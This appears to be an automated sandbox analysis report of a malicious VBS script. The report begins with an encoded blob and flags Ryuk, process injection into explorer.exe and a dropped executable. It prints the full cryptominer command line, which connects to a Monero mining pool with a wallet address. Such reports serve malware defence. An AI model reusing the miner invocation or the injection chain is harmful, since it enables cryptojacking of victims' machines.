RAAmdwC4ht5SUHqkcReROrdL96V7+E3hxSEtd39hiWhyGGkM3QLl/F6P0uKVskm0MvSPEOW7yM+gTeXtEjCvIEVpwjkKJ4b3P+hrAEMZbjI74g1cZZzewCffWqG3tmbZodv7WEVP59XxINnUV402gA9p3E9PlIKNtrn484D6szTvmE/ZbIhtFcmxejswyF8AUvz/irw2Zd0IlJr/zrDOwjK5igC5Hp4ushR0MyBWvqVEPJ5y0PSr9X0kiuyaAr6lQa+7UZK0t/o5T7o0kNqoVoshBJzN0S5fh+DtrSFbl2lSUowtW1cS0rLLP4gYQJEPMWnqhyJW95LtYjgii6ExbWTJ6t/x3JMKMXb+TlqmiWhyGGkM3QLl/F6P0uKVscxmdMnbF+H3Wyck+dcR+C/tcHhHajylOcAoCzDShlnHJdXS4Pmnfp/tOeipNc1oMZ1AolcqctWDIs6YALIDAGwFb2xcuV4fcbJzR63xF5LM4HSGKUqqwxaEHtuCauTji81ZsG+ak+TGD+ZgRBSKvp9XswZFl+DUgrKkA62vHafiNS/hR6A1wimSRpA8I+Q/ft2lcydCEgJHLvyltCqTwuwy56xYgqWbXzIn74O/eimEBv1nGY6Veg2SFdoQW6OO1q6DC6wXyfeyWAmGjYZ3FMrqPIoDfJ/5JbBYaMildXwsq+ggO8l8nnsFgpxIW2dBz/KgJ0uAOY5ZM7t+Wl8aq4w7SUJyfDkYXh/423c31S+sq+ggO8l8nnsFgpxIW2dBzfXn3Zlr24rOwUSVjQjPJ2eZFnKlh8BalFh6RrdcYAzS9ZiLGgvyL36etzadTzQteq6DC6wXyfeyWAmGjYZ3FMnrxORhACEXDYyiy2Nyg1sXMa3AGC72lyrJ8UbCOh1GkjnT+SVN+YgxXU3IRCSK+RpqPIoDfJ/5JbBYaMildXwM2HYKA0yBql20a4UfWhHNfxodDYIsbXKvmwTtJ4EWbQ2zLlCu2ylpAG8DCzYKeJrMqiOdBShtC8ZJWPZcE+76Ge4Nx0nWqQcBIPT4Qiig/kHjaD1ifwUELZegIElh0k1V+/qbpsuje4+3Yh1t+kUPOxodDYIsbXKvmwTtJ4EWbQGj2Nghwudp8aCP1mgTYtBpt3bv6rGV+Onknk0uLV/tjNsJGRp0nLdygfG0qr4Hd5v0eZk6Tej4BddKmRfQzWwK+bT7ai7+0GAMcKNylarAixodDYIsbXKvmwTtJ4EWbQiiM6y0skgXfs5Fmf5qjoQ/W

Signatures

Ryuk
Ransomware distributed via existing botnets, often Trickbot or Emotet.
ransomware ryuk

Blocklisted process makes network request 3 IoCs

flow	pid	Process
8	1808	WScript.exe
10	1808	WScript.exe
12	1808	WScript.exe

Executes dropped EXE 1 IoCs

pid	Process
2032	bin.txt

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/1092-120-0x0000000140000000-0x0000000140717000-memory.dmp	upx
behavioral2/memory/1092-125-0x0000000140000000-0x0000000140717000-memory.dmp	upx

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 2032 set thread context of 1092	2032	bin.txt	80

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeLockMemoryPrivilege	1092	explorer.exe
Token: SeLockMemoryPrivilege	1092	explorer.exe

Suspicious use of WriteProcessMemory 9 IoCs

description	pid	Process	procid_target
PID 1808 wrote to memory of 2032	1808	WScript.exe	79
PID 1808 wrote to memory of 2032	1808	WScript.exe	79
PID 2032 wrote to memory of 1092	2032	bin.txt	80
PID 2032 wrote to memory of 1092	2032	bin.txt	80
PID 2032 wrote to memory of 1092	2032	bin.txt	80
PID 2032 wrote to memory of 1092	2032	bin.txt	80
PID 2032 wrote to memory of 1092	2032	bin.txt	80
PID 2032 wrote to memory of 1092	2032	bin.txt	80
PID 2032 wrote to memory of 1092	2032	bin.txt	80

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\SiggiaW.vbs"
1⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:1808
- C:\Users\Public\bin.txt
  C:\Users\Public\bin.txt
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious use of WriteProcessMemory
  PID:2032
- - C:\Windows\explorer.exe
    C:\Windows\explorer.exe -B --donate-level=1 -a cryptonight --url=pool.supportxmr.com:5555 -u 8AsWuFbYMBQQFKBWQDAMiqgZnQLSQjB7p6hrYwxdocCvFdgJjYjckDiLGTEzwGRidoTZjnobmuwChgcNawxgur9f7i9fb88 -p x -R --variant=-1 -t 1 --max-cpu-usage=50
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1092

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

memory/1092-120-0x0000000140000000-0x0000000140717000-memory.dmp

Filesize
7.1MB

Download
memory/1092-122-0x0000000000700000-0x0000000000714000-memory.dmp

Filesize
80KB

Download
memory/1092-125-0x0000000140000000-0x0000000140717000-memory.dmp

Filesize
7.1MB

Download
memory/1092-126-0x0000000000740000-0x0000000000760000-memory.dmp

Filesize
128KB

Download
memory/1092-127-0x0000000000770000-0x0000000000790000-memory.dmp

Filesize
128KB

Download
memory/2032-117-0x0000000000190000-0x0000000000191000-memory.dmp

Filesize
4KB

Download
memory/2032-119-0x0000000003550000-0x0000000003552000-memory.dmp

Filesize
8KB

Download

Analysis

Sharing